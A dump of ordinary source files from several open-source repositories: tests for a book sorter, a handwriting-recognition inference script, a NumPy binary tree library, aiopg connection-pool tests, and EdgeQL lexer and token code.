monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,None,3,4,5,None,7,8,9,None,0.4)
foo = score_book(fake_data, 100)
assert foo == 376.0
assert logger.called_warn == True
def test_score_book_bad_isbn_isbn13_and_year(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (1,None,None,4,5,None,7,8,9,None,0.5)
foo = score_book(fake_data, 100)
assert foo == 456.0
assert logger.called_warn == True
def test_score_book_bad_isbn_isbn13_id_and_year(self, monkeypatch):
logger = FAKE_LOGGER()
monkeypatch.setattr('sorter.lib.rank.LOGGER', logger)
fake_data = (None,None,None,4,5,None,7,8,9,None,0.6)
foo = score_book(fake_data, 100)
assert foo == 536.0
assert logger.called_warn == True
def test_get_total_ratings(self):
fake_data = [
(1,2,3,4,5,6,7,8,9),
(9,8,7,6,5,4,3,2,1)
]
fake_total = get_total_ratings(fake_data)
assert fake_total == 10
class FAKE_LOGGER(object):
def __init__(self):
self.called_warn = False
def warn(self, *arg):
self.called_warn = True
```
#### File: tests/unit/test_request_data.py
```python
from sorter.lib.request_data import read_url
from urllib2 import HTTPError
class fake_urllib(object):
def __init__(self, should_fail=False):
self.should_fail = should_fail
def urlopen(self, uri):
if self.should_fail == True:
raise HTTPError('FAKER.GTLD', 404, 'Four Oh Four', None, None)
def read(self):
return "fake body"
def close(self):
pass
class fake_logger(object):
def __init__(self):
self.msg = None
def info(self, msg, *args):
pass
def warn(self, msg, *args):
self.msg = msg.reason
class TestRequestData(object):
def test_read_url(self, monkeypatch):
monkeypatch.setattr("urllib2.urlopen", lambda foo: fake_urllib())
monkeypatch.setattr("sorter.lib.request_data.LOGGER", fake_logger())
body = read_url("fakeurl")
assert body == "fake body"
def test_read_url_404(self, monkeypatch):
faker = fake_logger()
monkeypatch.setattr("sorter.lib.request_data.urllib2", fake_urllib(True))
monkeypatch.setattr("sorter.lib.request_data.LOGGER", faker)
body = read_url("fakeurl")
assert body == None
assert faker.msg == 'Four Oh Four'
```
#### File: tests/utils/get_element.py
```python
import os
import xml.etree.ElementTree as ElementTree
def get_element(file, xpath):
xml_file = os.path.abspath(file)
with open(xml_file, 'r') as myfile:
data = myfile.read()
myfile.close()
root = ElementTree.fromstring(data)
elem = root.find(xpath)
if elem != None:
return elem.text
else:
return None
def get_file_as_string(file):
xml_file = os.path.abspath(file)
with open(xml_file, 'r') as myfile:
data = myfile.read()
myfile.close()
return data
``` |
{
"source": "1sigmoid/zeta-ml-functions",
"score": 3
} |
#### File: SimpleHTR/src/main.py
```python
from __future__ import division
from __future__ import print_function
import json
import cv2
import editdistance
from DataLoader import DataLoader, Batch
from Model import Model, DecoderType
from SamplePreprocessor import preprocess
class FilePaths:
"filenames and paths to data"
mPath = ".\\simpTrain\\handwriting\\python36_venv\\"
fnCharList = mPath + 'SimpleHTR\\model\\charList.txt'
fnAccuracy = mPath + 'SimpleHTR\\model\\accuracy.txt'
fnTrain = mPath + 'SimpleHTR\\data\\'
fnInfer = mPath + 'SimpleHTR\\data\\test.png'
fnCorpus = mPath + 'SimpleHTR\\data\\corpus.txt'
fnPic = mPath + 'SimpleHTR\\pic\\pic.png'
fnResults = mPath + 'SimpleHTR\\pic\\results.json'
fnModel = mPath + 'SimpleHTR\\model\\'
def infer(model, fnImg, printOut = False):
"recognize text in image provided by file path"
img = preprocess(cv2.imread(fnImg, cv2.IMREAD_GRAYSCALE), Model.imgSize)
batch = Batch(None, [img])
(recognized, probability) = model.inferBatch(batch, True)
if not printOut:
return recognized, probability
else:
print('Recognized:', '"' + recognized[0] + '"')
print('Probability:', probability[0])
return recognized, probability
def predict(filepath, printOut = False):
"predict"
# infer text on test image
if printOut: print(open(FilePaths.fnAccuracy).read())
model = Model(open(FilePaths.fnCharList).read(), DecoderType.BestPath, mustRestore=True, dump = False)
return infer(model, filepath, printOut)
results = predict(FilePaths.fnPic)
open(FilePaths.fnResults, 'w').write(
json.dumps({
"recognized": results[0][0],
"probability": float(results[1][0])
})
)
``` |
{
"source": "1smaa/binarytree",
"score": 3
} |
#### File: binarytree/binarytree/bt.py
```python
import pickle
import os
import random
import numpy as np
import functools
from telegram import ChosenInlineResult
def arithmetic_error_catcher(f):
@functools.wraps(f)
def func(*args, **kwargs):
if not isinstance(args[1], (binarytree.AtomicBinaryTree,)) or args[0].type != args[1].type:
raise Exception("Binary trees not compatible.")
try:
return f(*args, **kwargs)
except:
raise Exception("Impossible arithmetic operation.")
return func
def obj_arithmetic_error_catcher(f):
@functools.wraps(f)
def func(*args, **kwargs):
if not isinstance(args[1], (binarytree.ObjectBinaryTree,)) or args[0].type != args[1].type:
raise Exception("Binary trees not compatible.")
try:
return f(*args, **kwargs)
except:
raise Exception("Impossible arithmetic operation.")
return func
def conversion_error_catcher(f):
@functools.wraps(f)
def func(*args, **kwargs):
try:
return f(*args, **kwargs)
except:
raise Exception("Conversion failed.")
return func
class binarytree(object):
def delete(name):
'''Deletes a binary tree from the storage.'''
if "storage" not in os.listdir():
raise Exception("Storage directory non-existent.")
if "{}.bt".format(name) in os.listdir("storage"):
os.remove(os.path.join("storage", "{}.bt".format(name)))
else:
raise Exception("File not found.")
class __binarytree(object):
def __init__(self):
pass
def __repr__(self):
return "{name}\n{structure}".format(name=self.name if self.name else "No Name", structure=str(self._structure))
def __bool__(self):
return not self._structure.shape[0] == 0
def __len__(self):
return self._structure.shape[0]
@conversion_error_catcher
def __list__(self):
return [node[0] for node in self._structure]
def store(self, name=None):
'''Stores the binary tree inside a specified file.'''
if not name:
name = self.name if self.name else "".join(
[chr(random.randint(97, 122)) for _ in range(10)])
if "storage" not in os.listdir():
os.mkdir("storage")
with open(os.path.join("storage", "{}.bt".format(name)), "wb") as f:
pickle.dump(self._structure, f)
def load(self, name=None):
'''Loads a binary tree from a specified file.'''
self.__check_file(name)
with open(os.path.join("storage", "{}.bt".format(name)), "rb") as f:
self._structure = pickle.load(f)
if not self.name:
self.name = name
def getObject(self):
'''Returns the tree structure using a matrix.
The first column is the value of the node, the second is the first child node,
the third one the second child node.'''
return self._structure
def __check_file(self, name=None):
if not name:
if self.name:
name = self.name
else:
raise Exception("File name needed.")
if "{}.bt".format(name) not in os.listdir("storage"):
raise Exception("Binary tree file not found.")
def _check_node(self, node):
return isinstance(node, (self.type,)) and (True if self.type is not dict else "key" in node.keys())
class AtomicBinaryTree(__binarytree):
def __init__(self, name=None, key_type=int):
'''Class to create, search, store and load binary trees.
Specifically created to handle atomic data, such as strings or numbers.'''
if name:
self.name = name
self._structure = np.ndarray((0, 3), key_type)
self.type = key_type
@arithmetic_error_catcher
def __add__(self, bt):
new = [node[0] for node in bt.getObject()]
for node in new:
self.__add_node(np.asscalar(node))
return self
@arithmetic_error_catcher
def __lt__(self, bt):
return self._structure.shape[0] > bt.getObject().shape[0]
@arithmetic_error_catcher
def __gt__(self, bt):
return self._structure.shape[0] < bt.getObject().shape[0]
@arithmetic_error_catcher
def __le__(self, bt):
return self._structure.shape[0] <= bt.getObject().shape[0]
@arithmetic_error_catcher
def __ge__(self, bt):
return self._structure.shape[0] >= bt.getObject().shape[0]
@arithmetic_error_catcher
def __eq__(self, bt):
new = [node[0] for node in bt.getObject()]
old = [node[0] for node in self._structure]
return set(new) == set(old)
@arithmetic_error_catcher
def __ne__(self, bt):
new = [node[0] for node in bt.getObject()]
old = [node[0] for node in self._structure]
return set(new) != set(old)
def add_nodes(*nodes):
'''Add a finite number of nodes to the binary tree.'''
if len(nodes) < 2:
raise Exception("No node was passed to the function.")
self = nodes[0]
nodes = nodes[1:]
for node in nodes:
if not self._check_node(node):
raise Exception(
"Can't recognize the value inside the node.")
try:
self.__add_node(node)
except:
raise Exception(
"There was an error while adding the node.")
def __add_node(self, node):
if self._structure.shape[0] == 0:
self._structure = np.append(
self._structure, [[node, -1, -1]], axis=0)
return
chosenNode = 0
p = -1
while True:
if node < self._structure[chosenNode][0]:
p = 1
else:
p = 2
if self._structure[chosenNode][p] == -1:
self._structure[chosenNode][p] = self._structure.shape[0]
break
chosenNode = self._structure[chosenNode][p]
self._structure = np.append(
self._structure, [[node, -1, -1]], axis=0)
def find_nodes(*nodes):
'''Find a finite number of nodes inside the binary tree.
Returns an array with the result(s) of the search for each node.'''
if len(nodes) < 2:
raise Exception("No node was passed to the function.")
self = nodes[0]
nodes = nodes[1:]
results = []
for node in nodes:
if not self._check_node(node):
raise Exception(
"Can't recognize the value inside the node.")
try:
results.append(self.__find_node(node))
except:
raise Exception("Error while exploring the tree.")
return results if len(results) != 1 else results[0]
def __find_node(self, node):
chosenNode = self._structure[0]
while chosenNode[0] != node:
if node < chosenNode[0]:
chosenNode = self._structure[chosenNode[1]
] if chosenNode[1] != -1 else None
else:
chosenNode = self._structure[chosenNode[2]
] if chosenNode[2] != -1 else None
if chosenNode is None:
return False
return True
def empty(self):
'''Empty the binary tree.'''
self._structure = np.ndarray((0, 3), self.type)
def eliminate(self, node):
'''Eliminates a specified node from the tree and its subtree.'''
chosenNode = self._structure[0]
father, index, pos = 0, 0, 1
while chosenNode[0] != node:
father = index
pos = 1 if node < chosenNode[0] else 2
index = chosenNode[pos]
chosenNode = self._structure[chosenNode[pos]
] if chosenNode[pos] != -1 else None
if chosenNode is None:
raise Exception("Node not found.")
self._structure[father][pos] = -1
self._structure = np.delete(self._structure, index, axis=0)
def subtree(self, node):
chosenNode = self._structure[0]
pos = 0
while node != chosenNode[0]:
pos = 1 if node < chosenNode[0] else 2
chosenNode = self._structure[chosenNode[pos]
] if chosenNode[pos] != -1 else None
if chosenNode is None:
raise Exception("Node not found.")
new = binarytree.AtomicBinaryTree(
name="sub_{}".format(self.name), key_type=self.type)
self.__build(new, chosenNode)
return new
def __build(self, new, chosenNode):
new.add_nodes(chosenNode[0].item())
if chosenNode[1] != -1:
self.__build(new, self._structure[chosenNode[1]])
if chosenNode[2] != -1:
self.__build(new, self._structure[chosenNode[2]])
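# Hypothetical usage sketch for AtomicBinaryTree (illustrative only):
#   bt = binarytree.AtomicBinaryTree(name="nums", key_type=int)
#   bt.add_nodes(5, 3, 8)
#   bt.find_nodes(3)        # -> True
#   bt.store()              # writes storage/nums.bt via pickle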
class ObjectBinaryTree(__binarytree):
def __init__(self, name=None):
'''Class to create, search, store and load binary trees.
Nodes must be dictionaries and include a 'key' key.'''
if name:
self.name = name
self._structure = np.ndarray((0, 3), dict)
self.type = dict
@obj_arithmetic_error_catcher
def __add__(self, bt):
if not isinstance(bt, (binarytree.ObjectBinaryTree,)) or self.type != bt.type:
raise
new = [node[0] for node in bt.getObject()]
for node in new:
self.__add_node(node)
return self
@obj_arithmetic_error_catcher
def __lt__(self, bt):
return self._structure.shape[0] > bt.getObject().shape[0]
@obj_arithmetic_error_catcher
def __gt__(self, bt):
return self._structure.shape[0] < bt.getObject().shape[0]
@obj_arithmetic_error_catcher
def __le__(self, bt):
return self._structure.shape[0] <= bt.getObject().shape[0]
@obj_arithmetic_error_catcher
def __ge__(self, bt):
return self._structure.shape[0] >= bt.getObject().shape[0]
@obj_arithmetic_error_catcher
def __eq__(self, bt):
new = [node[0] for node in bt.getObject()]
old = [node[0] for node in self._structure]
return set(new) == set(old)
@obj_arithmetic_error_catcher
def __ne__(self, bt):
new = [node[0] for node in bt.getObject()]
old = [node[0] for node in self._structure]
return set(new) != set(old)
def add_nodes(*nodes):
'''Add a finite number of nodes to the binary tree.'''
if len(nodes) < 2:
raise Exception("No node was passed to the function.")
self = nodes[0]
nodes = nodes[1:]
for node in nodes:
if not self._check_node(node):
raise Exception(
"Can't recognize the value inside the node.")
try:
self.__add_node(node)
except:
raise Exception(
"There was an error while adding the node.")
def __add_node(self, node):
if self._structure.shape[0] == 0:
self._structure = np.append(
self._structure, [[node, -1, -1]], axis=0)
return
chosenNode = self._structure[0]
p = -1
while True:
if node["key"] < chosenNode[0]["key"]:
p = 1
else:
p = 2
if chosenNode[p] == -1:
chosenNode[p] = self._structure.shape[0]
break
chosenNode = self._structure[chosenNode[p]]
self._structure = np.append(
self._structure, [[node, -1, -1]], axis=0)
def find_nodes(*keys):
'''Find a finite number of nodes inside the binary tree.
Returns an array with the result(s) of the search for each node.'''
if len(keys) < 2:
raise Exception("No node was passed to the function.")
self = keys[0]
keys = keys[1:]
results = []
for key in keys:
if not isinstance(key, (int, float, str,)):
raise Exception(
"Can't recognize the value inside the node.")
try:
results.append(self.__find_node(key))
except:
raise Exception("Error while exploring the tree.")
return results if len(results) != 1 else results[0]
def __find_node(self, key):
chosenNode = self._structure[0]
while chosenNode[0]["key"] != key:
if key < chosenNode[0]["key"]:
chosenNode = self._structure[chosenNode[1]
] if chosenNode[1] != -1 else None
else:
chosenNode = self._structure[chosenNode[2]
] if chosenNode[2] != -1 else None
if chosenNode is None:
break
return chosenNode[0] if chosenNode else None
def empty(self):
'''Empty the binary tree.'''
self._structure = np.ndarray((0, 3), dict)
def eliminate(self, node):
'''Eliminates a specified node from the tree and its subtree.'''
chosenNode = self._structure[0]
father, index, pos = 0, 0, 1
while chosenNode[0]["key"] != node:
if node < chosenNode[0]["key"]:
father = index
pos = 1
else:
father = index
pos = 2
index = chosenNode[pos]
chosenNode = self._structure[chosenNode[pos]
] if chosenNode[pos] != -1 else None
if chosenNode is None:
raise Exception("Node not found.")
self._structure[father][pos] = -1
self._structure = np.delete(self._structure, index, axis=0)
def subtree(self, node):
chosenNode = self._structure[0]
pos = 0
while node != chosenNode[0]["key"]:
pos = 1 if node < chosenNode[0]["key"] else 2
chosenNode = self._structure[chosenNode[pos]
] if chosenNode[pos] != -1 else None
if chosenNode is None:
raise Exception("Node not found.")
new = binarytree.ObjectBinaryTree(
name="sub_{}".format(self.name))
self.__build(new, chosenNode)
return new
def __build(self, new, chosenNode):
new.add_nodes(chosenNode[0])
if chosenNode[1] != -1:
self.__build(new, self._structure[chosenNode[1]])
if chosenNode[2] != -1:
self.__build(new, self._structure[chosenNode[2]])
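# Hypothetical usage sketch for ObjectBinaryTree (illustrative only; node dicts must contain a 'key'):
#   obt = binarytree.ObjectBinaryTree(name="people")
#   obt.add_nodes({"key": 5, "name": "eve"}, {"key": 2, "name": "bob"})
#   obt.find_nodes(2)       # -> {"key": 2, "name": "bob"}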
``` |
{
"source": "1st1/aiopg",
"score": 3
} |
#### File: aiopg/tests/test_pool.py
```python
import asyncio
import unittest
from unittest import mock
from psycopg2.extensions import TRANSACTION_STATUS_INTRANS
import aiopg
from aiopg.connection import Connection, TIMEOUT
from aiopg.pool import Pool
class TestPool(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(None)
self.pool = None
def tearDown(self):
if self.pool is not None:
self.pool.terminate()
self.loop.run_until_complete(self.pool.wait_closed())
self.loop.close()
self.loop = None
@asyncio.coroutine
def create_pool(self, no_loop=False, **kwargs):
loop = None if no_loop else self.loop
pool = yield from aiopg.create_pool(database='aiopg',
user='aiopg',
password='<PASSWORD>',
host='127.0.0.1',
loop=loop,
**kwargs)
self.pool = pool
return pool
def test_create_pool(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
self.assertIsInstance(pool, Pool)
self.assertEqual(10, pool.minsize)
self.assertEqual(10, pool.maxsize)
self.assertEqual(10, pool.size)
self.assertEqual(10, pool.freesize)
self.assertEqual(TIMEOUT, pool.timeout)
self.assertFalse(pool.echo)
self.loop.run_until_complete(go())
def test_create_pool2(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=10, maxsize=20)
self.assertIsInstance(pool, Pool)
self.assertEqual(10, pool.minsize)
self.assertEqual(20, pool.maxsize)
self.assertEqual(10, pool.size)
self.assertEqual(10, pool.freesize)
self.assertEqual(TIMEOUT, pool.timeout)
self.loop.run_until_complete(go())
def test_acquire(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
self.assertIsInstance(conn, Connection)
self.assertFalse(conn.closed)
cur = yield from conn.cursor()
yield from cur.execute('SELECT 1')
val = yield from cur.fetchone()
self.assertEqual((1,), val)
pool.release(conn)
self.loop.run_until_complete(go())
def test_release(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
self.assertEqual(9, pool.freesize)
self.assertEqual({conn}, pool._used)
pool.release(conn)
self.assertEqual(10, pool.freesize)
self.assertFalse(pool._used)
self.loop.run_until_complete(go())
def test_release_closed(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
self.assertEqual(9, pool.freesize)
yield from conn.close()
pool.release(conn)
self.assertEqual(9, pool.freesize)
self.assertFalse(pool._used)
self.assertEqual(9, pool.size)
conn2 = yield from pool.acquire()
self.assertEqual(9, pool.freesize)
self.assertEqual(10, pool.size)
pool.release(conn2)
self.loop.run_until_complete(go())
def test_bad_context_manager_usage(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
with self.assertRaises(RuntimeError):
with pool:
pass
self.loop.run_until_complete(go())
def test_context_manager(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
with (yield from pool) as conn:
self.assertIsInstance(conn, Connection)
self.assertEqual(9, pool.freesize)
self.assertEqual({conn}, pool._used)
self.assertEqual(10, pool.freesize)
self.loop.run_until_complete(go())
def test_clear(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
yield from pool.clear()
self.assertEqual(0, pool.freesize)
self.loop.run_until_complete(go())
def test_initial_empty(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0)
self.assertEqual(10, pool.maxsize)
self.assertEqual(0, pool.minsize)
self.assertEqual(0, pool.size)
self.assertEqual(0, pool.freesize)
with (yield from pool):
self.assertEqual(1, pool.size)
self.assertEqual(0, pool.freesize)
self.assertEqual(1, pool.size)
self.assertEqual(1, pool.freesize)
conn1 = yield from pool.acquire()
self.assertEqual(1, pool.size)
self.assertEqual(0, pool.freesize)
conn2 = yield from pool.acquire()
self.assertEqual(2, pool.size)
self.assertEqual(0, pool.freesize)
pool.release(conn1)
self.assertEqual(2, pool.size)
self.assertEqual(1, pool.freesize)
pool.release(conn2)
self.assertEqual(2, pool.size)
self.assertEqual(2, pool.freesize)
self.loop.run_until_complete(go())
def test_parallel_tasks(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0, maxsize=2)
self.assertEqual(2, pool.maxsize)
self.assertEqual(0, pool.minsize)
self.assertEqual(0, pool.size)
self.assertEqual(0, pool.freesize)
fut1 = pool.acquire()
fut2 = pool.acquire()
conn1, conn2 = yield from asyncio.gather(fut1, fut2,
loop=self.loop)
self.assertEqual(2, pool.size)
self.assertEqual(0, pool.freesize)
self.assertEqual({conn1, conn2}, pool._used)
pool.release(conn1)
self.assertEqual(2, pool.size)
self.assertEqual(1, pool.freesize)
self.assertEqual({conn2}, pool._used)
pool.release(conn2)
self.assertEqual(2, pool.size)
self.assertEqual(2, pool.freesize)
self.assertFalse(conn1.closed)
self.assertFalse(conn2.closed)
conn3 = yield from pool.acquire()
self.assertIs(conn3, conn1)
pool.release(conn3)
self.loop.run_until_complete(go())
def test_parallel_tasks_more(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0, maxsize=3)
fut1 = pool.acquire()
fut2 = pool.acquire()
fut3 = pool.acquire()
conn1, conn2, conn3 = yield from asyncio.gather(fut1, fut2, fut3,
loop=self.loop)
self.assertEqual(3, pool.size)
self.assertEqual(0, pool.freesize)
self.assertEqual({conn1, conn2, conn3}, pool._used)
pool.release(conn1)
self.assertEqual(3, pool.size)
self.assertEqual(1, pool.freesize)
self.assertEqual({conn2, conn3}, pool._used)
pool.release(conn2)
self.assertEqual(3, pool.size)
self.assertEqual(2, pool.freesize)
self.assertEqual({conn3}, pool._used)
self.assertFalse(conn1.closed)
self.assertFalse(conn2.closed)
pool.release(conn3)
self.assertEqual(3, pool.size)
self.assertEqual(3, pool.freesize)
self.assertFalse(pool._used)
self.assertFalse(conn1.closed)
self.assertFalse(conn2.closed)
self.assertFalse(conn3.closed)
conn4 = yield from pool.acquire()
self.assertIs(conn4, conn1)
pool.release(conn4)
self.loop.run_until_complete(go())
def test_default_event_loop(self):
asyncio.set_event_loop(self.loop)
@asyncio.coroutine
def go():
pool = yield from self.create_pool(no_loop=True)
self.assertIs(pool._loop, self.loop)
self.loop.run_until_complete(go())
def test_cursor(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
with (yield from pool.cursor()) as cur:
yield from cur.execute('SELECT 1')
ret = yield from cur.fetchone()
self.assertEqual((1,), ret)
self.assertTrue(cur.closed)
self.loop.run_until_complete(go())
@mock.patch("aiopg.pool.logger")
def test_release_with_invalid_status(self, m_log):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
self.assertEqual(9, pool.freesize)
self.assertEqual({conn}, pool._used)
cur = yield from conn.cursor()
yield from cur.execute('BEGIN')
cur.close()
pool.release(conn)
self.assertEqual(9, pool.freesize)
self.assertFalse(pool._used)
self.assertTrue(conn.closed)
m_log.warning.assert_called_with(
"Invalid transaction status on released connection: %d",
TRANSACTION_STATUS_INTRANS)
self.loop.run_until_complete(go())
def test__fill_free(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=1)
with (yield from pool):
self.assertEqual(0, pool.freesize)
self.assertEqual(1, pool.size)
conn = yield from asyncio.wait_for(pool.acquire(),
timeout=0.5,
loop=self.loop)
self.assertEqual(0, pool.freesize)
self.assertEqual(2, pool.size)
pool.release(conn)
self.assertEqual(1, pool.freesize)
self.assertEqual(2, pool.size)
self.assertEqual(2, pool.freesize)
self.assertEqual(2, pool.size)
self.loop.run_until_complete(go())
def test_connect_from_acquire(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0)
self.assertEqual(0, pool.freesize)
self.assertEqual(0, pool.size)
with (yield from pool):
self.assertEqual(1, pool.size)
self.assertEqual(0, pool.freesize)
self.assertEqual(1, pool.size)
self.assertEqual(1, pool.freesize)
self.loop.run_until_complete(go())
def test_create_pool_with_timeout(self):
@asyncio.coroutine
def go():
timeout = 0.1
pool = yield from self.create_pool(timeout=timeout)
self.assertEqual(timeout, pool.timeout)
conn = yield from pool.acquire()
self.assertEqual(timeout, conn.timeout)
pool.release(conn)
self.loop.run_until_complete(go())
def test_cursor_with_timeout(self):
@asyncio.coroutine
def go():
timeout = 0.1
pool = yield from self.create_pool()
with (yield from pool.cursor(timeout=timeout)) as cur:
self.assertEqual(timeout, cur.timeout)
self.loop.run_until_complete(go())
def test_concurrency(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=2, maxsize=4)
c1 = yield from pool.acquire()
c2 = yield from pool.acquire()
self.assertEqual(0, pool.freesize)
self.assertEqual(2, pool.size)
pool.release(c1)
pool.release(c2)
self.loop.run_until_complete(go())
def test_invalid_minsize_and_maxsize(self):
@asyncio.coroutine
def go():
with self.assertRaises(ValueError):
yield from self.create_pool(minsize=-1)
with self.assertRaises(ValueError):
yield from self.create_pool(minsize=5, maxsize=2)
self.loop.run_until_complete(go())
def test_true_parallel_tasks(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(minsize=0, maxsize=1)
self.assertEqual(1, pool.maxsize)
self.assertEqual(0, pool.minsize)
self.assertEqual(0, pool.size)
self.assertEqual(0, pool.freesize)
maxsize = 0
minfreesize = 100
def inner():
nonlocal maxsize, minfreesize
maxsize = max(maxsize, pool.size)
minfreesize = min(minfreesize, pool.freesize)
conn = yield from pool.acquire()
maxsize = max(maxsize, pool.size)
minfreesize = min(minfreesize, pool.freesize)
yield from asyncio.sleep(0.01, loop=self.loop)
pool.release(conn)
maxsize = max(maxsize, pool.size)
minfreesize = min(minfreesize, pool.freesize)
yield from asyncio.gather(inner(), inner(),
loop=self.loop)
self.assertEqual(1, maxsize)
self.assertEqual(0, minfreesize)
self.loop.run_until_complete(go())
def test_cannot_acquire_after_closing(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
pool.close()
with self.assertRaises(RuntimeError):
yield from pool.acquire()
self.loop.run_until_complete(go())
def test_wait_closed(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
c1 = yield from pool.acquire()
c2 = yield from pool.acquire()
self.assertEqual(10, pool.size)
self.assertEqual(8, pool.freesize)
ops = []
@asyncio.coroutine
def do_release(conn):
yield from asyncio.sleep(0, loop=self.loop)
pool.release(conn)
ops.append('release')
@asyncio.coroutine
def wait_closed():
yield from pool.wait_closed()
ops.append('wait_closed')
pool.close()
yield from asyncio.gather(wait_closed(),
do_release(c1),
do_release(c2),
loop=self.loop)
self.assertEqual(['release', 'release', 'wait_closed'], ops)
self.assertEqual(0, pool.freesize)
self.loop.run_until_complete(go())
def test_echo(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool(echo=True)
self.assertTrue(pool.echo)
with (yield from pool) as conn:
self.assertTrue(conn.echo)
self.loop.run_until_complete(go())
def test_terminate_with_acquired_connections(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
pool.terminate()
yield from pool.wait_closed()
self.assertTrue(conn.closed)
self.loop.run_until_complete(go())
def test_release_closed_connection(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
conn.close()
pool.release(conn)
self.loop.run_until_complete(go())
def test_wait_closing_on_not_closed(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
with self.assertRaises(RuntimeError):
yield from pool.wait_closed()
self.loop.run_until_complete(go())
def test_release_terminated_pool(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
conn = yield from pool.acquire()
pool.terminate()
yield from pool.wait_closed()
pool.release(conn)
self.loop.run_until_complete(go())
def test_close_with_acquired_connections(self):
@asyncio.coroutine
def go():
pool = yield from self.create_pool()
yield from pool.acquire()
pool.close()
with self.assertRaises(asyncio.TimeoutError):
yield from asyncio.wait_for(pool.wait_closed(),
0.1, loop=self.loop)
self.loop.run_until_complete(go())
``` |
{
"source": "1st1/edgedb",
"score": 2
} |
#### File: parser/grammar/lexer.py
```python
import re
from edb.lang.common import lexer
from .keywords import edgeql_keywords
__all__ = ('EdgeQLLexer',)
STATE_KEEP = 0
STATE_BASE = 1
re_dquote = r'\$([A-Za-z\200-\377_][0-9]*)*\$'
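# Editorial note (illustrative, not from the original source): this pattern is meant to match
# dollar-quote delimiters such as $$ or $tag$ that open and close dollar-quoted strings.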
Rule = lexer.Rule
class EdgeQLLexer(lexer.Lexer):
start_state = STATE_BASE
NL = 'NL'
MULTILINE_TOKENS = frozenset(('SCONST',))
RE_FLAGS = re.X | re.M | re.I
# Basic keywords
keyword_rules = [Rule(token=tok[0],
next_state=STATE_KEEP,
regexp=lexer.group(val))
for val, tok in edgeql_keywords.items()]
common_rules = keyword_rules + [
Rule(token='WS',
next_state=STATE_KEEP,
regexp=r'[^\S\n]+'),
Rule(token='NL',
next_state=STATE_KEEP,
regexp=r'\n'),
Rule(token='COMMENT',
next_state=STATE_KEEP,
regexp=r'''\#.*?$'''),
Rule(token='TURNSTILE',
next_state=STATE_KEEP,
regexp=r':='),
Rule(token='ARROW',
next_state=STATE_KEEP,
regexp=r'->'),
Rule(token='??',
next_state=STATE_KEEP,
regexp=r'\?\?'),
Rule(token='::',
next_state=STATE_KEEP,
regexp=r'::'),
# special path operators
Rule(token='.<',
next_state=STATE_KEEP,
regexp=r'\.<'),
Rule(token='.>',
next_state=STATE_KEEP,
regexp=r'\.>'),
Rule(token='OP',
next_state=STATE_KEEP,
regexp=r'''
(?: >= | <= | != | \?= | \?!=)
'''),
# SQL ops
Rule(token='self',
next_state=STATE_KEEP,
regexp=r'[,()\[\].@;:+\-*/%^<>=]'),
Rule(token='FCONST',
next_state=STATE_KEEP,
regexp=r"""
(?: \d+ (?:\.\d+)?
(?:[eE](?:[+\-])?[0-9]+)
)
|
(?: \d+\.\d+)
"""),
Rule(token='ICONST',
next_state=STATE_KEEP,
regexp=r'([1-9]\d* | 0)(?![0-9])'),
Rule(token='SCONST',
next_state=STATE_KEEP,
regexp=rf'''
(?P<Q>
# capture the opening quote in group Q
(
' | " |
{re_dquote}
)
)
(?:
(\\['"] | \n | .)*?
)
(?P=Q) # match closing quote type with whatever is in Q
'''),
Rule(token='BADIDENT',
next_state=STATE_KEEP,
regexp=r'''
__[^\W\d]\w*__
|
`__.*?__`
'''),
Rule(token='IDENT',
next_state=STATE_KEEP,
regexp=r'[^\W\d]\w*'),
Rule(token='QIDENT',
next_state=STATE_KEEP,
regexp=r'`[^@].*?`'),
Rule(token='self',
next_state=STATE_KEEP,
regexp=r'[\{\}$]'),
]
states = {
STATE_BASE:
common_rules,
}
def token_from_text(self, rule_token, txt):
if rule_token == 'BADIDENT':
self.handle_error(txt)
tok = super().token_from_text(rule_token, txt)
if rule_token == 'self':
tok = tok._replace(type=txt)
elif rule_token == 'QIDENT':
tok = tok._replace(type='IDENT', value=txt[1:-1])
return tok
def lex(self):
buffer = []
for tok in super().lex():
tok_type = tok.type
if tok_type in {'WS', 'NL', 'COMMENT'}:
# Strip out whitespace and comments
continue
else:
if buffer:
yield from iter(buffer)
buffer[:] = []
yield tok
def lex_highlight(self):
return super().lex()
```
#### File: parser/grammar/tokens.py
```python
import re
import sys
import types
from edb.lang.common import parsing
from . import keywords
from . import precedence
from . import lexer
clean_string = re.compile(r"'(?:\s|\n)+'")
string_quote = re.compile(lexer.re_dquote)
class TokenMeta(parsing.TokenMeta):
pass
class Token(parsing.Token, metaclass=TokenMeta,
precedence_class=precedence.PrecedenceMeta):
pass
class T_DOT(Token, lextoken='.'):
pass
class T_DOTFW(Token, lextoken='.>'):
pass
class T_DOTBW(Token, lextoken='.<'):
pass
class T_LBRACKET(Token, lextoken='['):
pass
